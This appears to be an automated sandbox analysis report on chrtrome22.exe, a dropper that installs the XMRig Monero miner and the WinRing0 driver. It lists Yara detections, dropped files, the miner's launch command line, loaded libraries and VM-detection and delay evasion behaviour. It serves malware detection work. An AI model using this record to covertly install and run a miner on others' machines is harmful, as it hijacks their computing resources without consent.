                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: Process Memory Space: xmrig.exe PID: 2312, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile created: C:\xmrig\xmrig-6.22.2\WinRing0x64.sysJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\xmrig\xmrig-6.22.2\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                    Source: chrtrome22.exe, 00000000.00000000.1662058300.0000000000622000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiq33xp0h.exeX vs chrtrome22.exe
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexmrig.exe, vs chrtrome22.exe
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.00000000029EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs chrtrome22.exe
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs chrtrome22.exe
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs chrtrome22.exe
                    Source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs chrtrome22.exe
                    Source: chrtrome22.exeBinary or memory string: OriginalFilenameiq33xp0h.exeX vs chrtrome22.exe
                    Source: chrtrome22.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 2.0.xmrig.exe.7ff640ec0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 00000002.00000000.1753490788.00007FF6412E7000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: xmrig.exe PID: 2312, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: WinRing0x64.sys.0.drBinary string: \Device\WinRing0_1_2_0
                    Source: classification engineClassification label: mal100.evad.mine.winEXE@5/14@5/5
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile created: C:\Users\user\Downloads\xmrig.zipJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zw0o1iqr.gns.ps1Jump to behavior
                    Source: chrtrome22.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: chrtrome22.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: chrtrome22.exeReversingLabs: Detection: 63%
                    Source: chrtrome22.exeVirustotal: Detection: 58%
                    Source: unknownProcess created: C:\Users\user\Desktop\chrtrome22.exe "C:\Users\user\Desktop\chrtrome22.exe"
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: chrtrome22.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: chrtrome22.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: chrtrome22.exe, 00000000.00000002.1755040993.0000000002ED8000.00000004.00000800.00020000.00000000.sdmp, chrtrome22.exe, 00000000.00000002.1755040993.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.0.dr
                    Source: xmrig.exe.0.drStatic PE information: section name: _RANDOMX
                    Source: xmrig.exe.0.drStatic PE information: section name: _TEXT_CN
                    Source: xmrig.exe.0.drStatic PE information: section name: _TEXT_CN
                    Source: xmrig.exe.0.drStatic PE information: section name: _RDATA

                    Persistence and Installation Behavior

                    barindex
                    Sample is not signed and drops a device driver
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile created: C:\xmrig\xmrig-6.22.2\WinRing0x64.sysJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile created: C:\xmrig\xmrig-6.22.2\xmrig.exeJump to dropped file
                    Source: C:\Users\user\Desktop\chrtrome22.exeFile created: C:\xmrig\xmrig-6.22.2\WinRing0x64.sysJump to dropped file
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Query firmware table information (likely to detect VMs)
                    Source: C:\xmrig\xmrig-6.22.2\xmrig.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeMemory allocated: D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeMemory allocated: 1A970000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599233Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599124Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598905Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598577Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598359Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598249Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598140Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 598031Jump to behavior
                    Source: C:\Users\user\Desktop\chrtrome22.exeThread delayed: delay time: 597921Jump to behavior
